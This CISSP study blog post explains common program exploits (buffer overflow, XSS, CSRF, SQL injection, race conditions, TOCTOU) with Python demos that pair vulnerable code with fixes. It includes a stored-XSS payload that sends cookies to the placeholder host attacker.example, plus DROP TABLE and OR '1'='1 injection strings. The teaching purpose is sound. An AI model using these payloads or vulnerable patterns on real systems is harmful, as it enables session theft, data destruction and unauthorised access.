CISSP Blog Post 25, Domain 8: Program Exploits


Credit: Post based on CISSP course presented by Dennis Lee, November 2018

Ok! Last domain of the CISSP – we have two topics to cover – we’ll cover one today and one next week.

In this post, we’ll cover some common Program Exploits at a high level to get you familiar with terminology.

The first is a Memory Buffer Overflow. A program sets aside a fixed-size block of memory (a buffer) for some input, such as a field on a website form, and copies the input into it without checking its length. An attacker supplies a string longer than the buffer, and the extra bytes overwrite whatever sits next to the buffer in memory: other variables, a privilege flag, or the return address the CPU will jump to when the function finishes. Depending on what gets overwritten, the result is corrupted data, a crash, or the attacker's code running with the program's privileges. The fix belongs in the program that ingests the form, not in the form itself: compare the length of every input against the size of the buffer before copying, use length-bounded copy functions, and prefer memory-safe languages or libraries where possible. Compiler and OS mitigations (stack canaries, non-executable memory, ASLR) make exploitation harder but do not replace the length check.
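The following is an added example, not from the course or the original post, that reproduces the overflow in Python through ctypes so it can be run without a C toolchain. The struct layout, the privilege flag sitting directly after the username buffer, and the attacker input are all constructed for the demonstration; the pattern is the same one a C program hits when it calls strcpy into a fixed-size array.

```python
import ctypes

USERNAME_LEN = 16  # constructed: size of the fixed username buffer


class LoginRecord(ctypes.Structure):
    """Constructed layout: a fixed-size username buffer immediately followed by
    a privilege flag, the way a C struct would lay them out in memory."""
    _fields_ = [("username", ctypes.c_char * USERNAME_LEN),
                ("is_admin", ctypes.c_int32)]


def copy_unchecked(rec, data):
    """The bug: copy every byte of the input into the buffer, strcpy-style,
    without comparing len(data) to the buffer size. Bytes past the end land in
    whatever follows the buffer in memory; here that is is_admin."""
    dst = ctypes.addressof(rec) + LoginRecord.username.offset
    ctypes.memmove(dst, data, len(data))


def copy_checked(rec, data):
    """The fix: validate the length against the buffer before touching memory."""
    if len(data) > USERNAME_LEN:
        raise ValueError(f"username longer than {USERNAME_LEN} bytes rejected")
    dst = ctypes.addressof(rec) + LoginRecord.username.offset
    ctypes.memmove(dst, data, len(data))


def login_is_admin(copy_fn, data):
    """Fill a fresh (zeroed) record with the given copy routine and report
    whether the privilege flag ended up set."""
    rec = LoginRecord()  # ctypes zero-initialises, so is_admin starts at 0
    copy_fn(rec, data)
    return bool(rec.is_admin)


def checked_copy_rejects(data):
    """True if the bounds-checked copy refuses the input."""
    try:
        login_is_admin(copy_checked, data)
        return False
    except ValueError:
        return True


# Constructed attacker input: 16 bytes fill the buffer exactly, the next 4
# spill into is_admin and set it to a non-zero value.
OVERFLOW_INPUT = b"A" * USERNAME_LEN + b"\x01\x00\x00\x00"

if __name__ == "__main__":
    print("normal name, unchecked copy -> admin?", login_is_admin(copy_unchecked, b"alice"))
    print("overflow input, unchecked copy -> admin?", login_is_admin(copy_unchecked, OVERFLOW_INPUT))
    print("overflow input, checked copy rejected?", checked_copy_rejects(OVERFLOW_INPUT))
```

The unchecked copy never reads past the struct, so the demo is safe to run, but the same four stray bytes written past a real stack buffer would reach saved registers and the return address.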

A Covert Channel is a path for transferring information between two parties that the security policy does not permit, using a mechanism that was never designed for communication. There are two classic types. A Covert Storage Channel uses a shared resource as the message: one process writes to something the other can observe (a file name, a lock, the amount of free disk space, an unused bit in a packet header) and the other reads it back. A Covert Timing Channel uses the timing of observable events instead: the sender modulates something like CPU load or response latency, and the receiver decodes the pattern over time. The course example of using screen flicker to exfiltrate data from a facility is a timing channel, since the data leaves as a pattern over time rather than as a stored object. Covert channels are hard to eliminate entirely; the usual controls are limiting shared resources, adding noise to timing, and monitoring for anomalous patterns.

Cross-Site Scripting (XSS) is a well-known attack in which a malicious user submits content containing a script, for example a comment in a web form, and the site stores it and later echoes it into pages without encoding it. When a regular user loads that page, their browser cannot tell the injected script from the site's own and runs it with the site's privileges, which can be used to harvest session cookies or make requests as the victim. This stored variant is the one described here; reflected XSS does the same thing with input echoed straight back from a URL or request. The defense belongs with the developer: encode untrusted data for the context it is inserted into (HTML body, attribute, JavaScript), validate input, set a Content-Security-Policy, and mark session cookies HttpOnly so scripts cannot read them. A user can block the attack by disabling scripting in their browser, but that breaks most modern sites, so it is a last resort rather than the control to rely on.

Cross-Site Request Forgery (CSRF) is related but abuses trust in the other direction. Picture a user with two browser tabs open. In Tab 2 they are logged in to their banking site. In Tab 1 they have an attacker's page containing an image tag, a hidden form, or a script whose target is a transfer action on that banking site. When Tab 1 triggers the request, the browser automatically attaches the bank's cookies to it, because cookies are sent to the domain that set them regardless of which page started the request. The bank sees a valid session and carries out the transaction, believing it is legitimate. The defense is for the bank to require proof that the request came from its own pages: an unpredictable anti-CSRF token embedded in its forms and checked on every state-changing request, the SameSite attribute on session cookies, and re-authentication for sensitive actions.
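As an added example covering both the XSS and CSRF descriptions above (written for this post, not course material), here is a minimal comment renderer and transfer handler in Python. The attacker payload, the hostname attacker.example, the session identifiers and the server secret are all constructed for the demonstration; in a real application the token would be issued by the web framework and checked by its middleware.

```python
import hashlib
import hmac
import html
import secrets

# ---- Cross-Site Scripting: the comment feature -----------------------------
# Constructed stored-XSS payload. If the site renders it raw, every visitor's
# browser runs it and sends their cookie to the attacker's server
# (attacker.example is a placeholder hostname).
STORED_PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def render_comment_raw(author, body):
    """The bug: untrusted text concatenated straight into the page markup."""
    return f"<li><b>{author}</b>: {body}</li>"


def render_comment_escaped(author, body):
    """The fix: encode for the HTML context. '<' becomes '&lt;', so the browser
    displays the text instead of parsing it as a script element."""
    return f"<li><b>{html.escape(author)}</b>: {html.escape(body)}</li>"


# ---- Cross-Site Request Forgery: the transfer endpoint -----------------------
SERVER_SECRET = secrets.token_bytes(32)  # constructed; would come from server config


def issue_csrf_token(session_id):
    """Token bound to the session via HMAC. The bank embeds it in its own
    transfer form; a page on another origin cannot read that form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(cookie_session, form_token):
    """Returns True if the transfer is executed.

    The session cookie alone is not proof of intent: the browser attaches it to
    any request for the bank's domain, including one triggered by an <img> or
    hidden form on an attacker's tab. The token is proof, because only a page
    served by the bank can read it (same-origin policy)."""
    if cookie_session is None:
        return False  # not logged in at all
    expected = issue_csrf_token(cookie_session)
    if form_token is None or not hmac.compare_digest(expected, form_token):
        return False  # forged request: cookie present, token missing or wrong
    return True  # debit the account here


if __name__ == "__main__":
    print(render_comment_raw("mallory", STORED_PAYLOAD))
    print(render_comment_escaped("mallory", STORED_PAYLOAD))
    print("forged transfer accepted?", handle_transfer("sess-victim", None))
    print("real transfer accepted?", handle_transfer("sess-victim", issue_csrf_token("sess-victim")))
```

hmac.compare_digest is used rather than == so that a wrong token takes the same time to reject whatever prefix it shares with the right one. A SameSite=Lax or Strict attribute on the session cookie would stop the browser from attaching it to cross-site requests in the first place; the token check is still worth keeping as defense in depth.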

Memory or Object Reuse is about residual data: when memory pages, disk blocks, or other storage objects are freed and handed to a new process or user, whatever the previous owner left there is still present unless it was cleared. The operating system should zero memory before reassigning it, programs should wipe sensitive buffers (keys, passwords) before releasing them, and storage media must be sanitized (overwritten, degaussed, or destroyed) before it is reused, with the sanitization recorded in a protected audit log trail.

Trapdoors / Back-doors / Maintenance Hooks are hidden mechanisms for bypassing normal authentication or access controls. They are put in by programmers, typically for convenience when debugging their code, and become a vulnerability when they are left in the shipped product or discovered by an attacker. Code review before release and monitoring for undocumented entry points are the controls.

SQL Injection is where a front-end form passes user input into a query that the program builds by string concatenation, so SQL syntax inside the input runs on the back-end database and returns data the attacker should not see, modifies or deletes data, or runs other commands. For example, suppose the program builds its statement around a "First Name" field and someone enters “Bobby'; DROP TABLE users; --”. The first quote closes the string literal the program opened, the semicolon ends that statement, DROP TABLE users is a second statement, and the trailing -- comments out whatever the program appends afterwards. If there is no validation or neutralization of form entries, the table is gone. The primary fix is parameterized queries (prepared statements), which send values separately from the SQL text so they are never parsed as code; input validation, least-privilege database accounts that are not allowed to DROP tables, and database-specific escaping are additional layers.
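The following added example (not from the course or the original post) runs the injection against an in-memory SQLite database with Python's standard sqlite3 module. The schema, the two sample users and the attacker inputs are constructed for the demo. SQLite's execute() only runs one statement per call, so the vulnerable registration function uses executescript() to behave like the many database drivers that accept stacked statements; the DROP payload is adapted to the column list of that particular INSERT.

```python
import sqlite3


def fresh_db():
    """Constructed sample schema and data for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, first_name TEXT, role TEXT);
        INSERT INTO users (first_name, role) VALUES ('Alice', 'admin'), ('Bob', 'user');
    """)
    return conn


def lookup_vulnerable(conn, first_name):
    """The bug: the form value is pasted into the SQL text, so quotes and
    keywords inside it become part of the statement."""
    sql = f"SELECT first_name, role FROM users WHERE first_name = '{first_name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, first_name):
    """The fix: a parameterized query. The value travels separately from the
    statement and is only ever treated as data, never parsed as SQL."""
    return conn.execute(
        "SELECT first_name, role FROM users WHERE first_name = ?", (first_name,)
    ).fetchall()


def register_vulnerable(conn, first_name):
    """Same bug on an INSERT. executescript() stands in for drivers that run
    several statements per call, so a stacked statement in the input runs too."""
    conn.executescript(
        f"INSERT INTO users (first_name, role) VALUES ('{first_name}', 'user');"
    )


def register_safe(conn, first_name):
    """Parameterized INSERT: the whole payload is stored as a literal name."""
    conn.execute("INSERT INTO users (first_name, role) VALUES (?, 'user')", (first_name,))


def users_table_exists(conn):
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row[0] == 1


# Constructed attacker inputs typed into the "First Name" field.
BYPASS_INPUT = "x' OR '1'='1"                          # makes the WHERE clause match every row
DROP_INPUT = "Bobby', 'user'); DROP TABLE users; --"   # closes the INSERT, appends a DROP

if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable lookup:", lookup_vulnerable(db, BYPASS_INPUT))  # both users
    print("safe lookup:", lookup_safe(db, BYPASS_INPUT))              # nobody has that name
    register_vulnerable(db, DROP_INPUT)
    print("users table still exists after vulnerable insert?", users_table_exists(db))
    db = fresh_db()
    register_safe(db, DROP_INPUT)
    print("users table still exists after safe insert?", users_table_exists(db))
    print("stored as plain text:", lookup_safe(db, DROP_INPUT))
```

The safe lookup returning an empty list for BYPASS_INPUT is the point: the database looked for a user literally named x' OR '1'='1 and found none, because the placeholder never let the quotes and OR reach the parser.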

A Race Condition Attack exploits the fact that two or more processes or threads act on shared state, and the outcome depends on the order in which their steps happen to interleave. A physical representation of this would be two joint bank account owners each making a withdrawal at the same moment. Each teller checks the balance, sees enough money, and then debits the account, but both checks happen before either debit, so if the combined withdrawals are larger than the balance the account is overdrawn without either teller noticing. In software the fix is to make the check and the action one indivisible step: hold a lock across both, use a database transaction, or use an atomic operation.
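The joint-account race as an added example (written for this post, not course material), with two Python threads playing the two owners. The account model, the balances and the deliberate sleep are constructed; the sleep stands in for the latency of a real balance check (a database round trip) and is only there to make the window between the check and the debit wide enough to hit reliably.

```python
import threading
import time


class JointAccount:
    """Constructed model of the shared account."""

    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()

    def withdraw_unlocked(self, amount):
        """The bug: check and debit are two separate steps, and the other
        owner's thread can run between them."""
        if self.balance >= amount:   # check: enough money right now
            time.sleep(0.05)         # window: the other owner passes the same check
            self.balance -= amount   # act on a check that may no longer hold
            return True
        return False

    def withdraw_locked(self, amount):
        """The fix: hold the lock across check and debit so they are atomic
        with respect to the other owner."""
        with self.lock:
            if self.balance >= amount:
                time.sleep(0.05)     # same latency, but nobody else can check meanwhile
                self.balance -= amount
                return True
            return False


def run_joint_withdrawals(locked, balance=100, amount=80):
    """Two owners withdraw the same amount at the same moment; returns the
    final balance. Constructed defaults: 100 in the account, 80 each."""
    acct = JointAccount(balance)
    withdraw = acct.withdraw_locked if locked else acct.withdraw_unlocked
    owners = [threading.Thread(target=withdraw, args=(amount,)) for _ in range(2)]
    for t in owners:
        t.start()
    for t in owners:
        t.join()
    return acct.balance


if __name__ == "__main__":
    print("unlocked final balance:", run_joint_withdrawals(locked=False))  # overdrawn
    print("locked final balance:", run_joint_withdrawals(locked=True))     # second withdrawal refused
```

Without the lock both threads see 100 >= 80, both sleep, and both subtract, leaving -60. With the lock the second owner's check runs only after the first debit has landed, sees 20, and is refused.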

Time of Check / Time of Use (TOCTOU) is a specific kind of race condition: a program checks a condition (does this user have permission? does this path point at a file they are allowed to read?) and then acts on the result a moment later, but the thing that was checked can change in between. The classic case is checking a file by name and then opening it by name; an attacker who can repoint that name in the gap gets the program to open a file the check would have refused. The course example is a variation on the same gap: if account permissions are checked once and the answer is then trusted for the rest of a session, a later permission change may not take effect until the check is repeated, for instance when the user refreshes their browser or logs in again. The fix is to close the gap: check the object you will actually use (the open file handle, not the path) and re-check as close to the point of use as possible.
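The file-name version of TOCTOU as an added example (written for this post, not course material). It assumes a POSIX system with symlink support. The temporary directory, the "public" and "secret" files, and the attacker's symlink swap are constructed; the swap is run from a callback inside the window so the race is deterministic rather than depending on thread scheduling.

```python
import os
import shutil
import tempfile


def build_sandbox():
    """Constructed fixture: a file the service may serve, a file it must not,
    and a symlink 'report.txt' the attacker controls that initially points at
    the allowed file."""
    tmp = tempfile.mkdtemp()
    allowed = os.path.join(tmp, "public.txt")
    secret = os.path.join(tmp, "secret.txt")
    link = os.path.join(tmp, "report.txt")
    with open(allowed, "w") as f:
        f.write("quarterly report")
    with open(secret, "w") as f:
        f.write("TOP SECRET")
    os.symlink(allowed, link)
    return tmp, link, allowed, secret


def same_file(st_a, st_b):
    """Two stat results describe the same inode on the same device."""
    return (st_a.st_dev, st_a.st_ino) == (st_b.st_dev, st_b.st_ino)


def read_vulnerable(path, allowed_path, race_window):
    """CHECK by name, then USE by name. Whatever happens in between (here the
    race_window callback, standing in for an attacker process) can make the
    same name resolve to a different file."""
    if not same_file(os.stat(path), os.stat(allowed_path)):
        raise PermissionError("not an approved file")
    race_window()
    with open(path) as f:          # the name is resolved a second time here
        return f.read()


def read_fixed(path, allowed_path, race_window):
    """Open first, then CHECK the descriptor with fstat, then read through that
    same descriptor. The name can change all it likes; the descriptor cannot."""
    fd = os.open(path, os.O_RDONLY)
    with os.fdopen(fd) as f:       # f owns fd and closes it on exit
        race_window()
        if not same_file(os.fstat(fd), os.stat(allowed_path)):
            raise PermissionError("opened file is not an approved file")
        return f.read()


def run(reader, swap_before=False):
    """Returns what the reader hands back, or None if it refused. By default the
    attacker swaps the symlink inside the window; with swap_before=True the
    swap happens first, so both versions should refuse."""
    tmp, link, allowed, secret = build_sandbox()

    def attacker_swaps_link():
        os.unlink(link)
        os.symlink(secret, link)

    try:
        if swap_before:
            attacker_swaps_link()
            return reader(link, allowed, lambda: None)
        return reader(link, allowed, attacker_swaps_link)
    except PermissionError:
        return None
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    print("vulnerable reader returned:", run(read_vulnerable))  # the secret
    print("fixed reader returned:", run(read_fixed))            # the approved file
```

The fixed version does not try to make the window shorter; it removes it by checking the very object it is about to read. The same idea applies to the permission example in the text: re-evaluate the permission at the point of use rather than trusting an answer obtained earlier in the session.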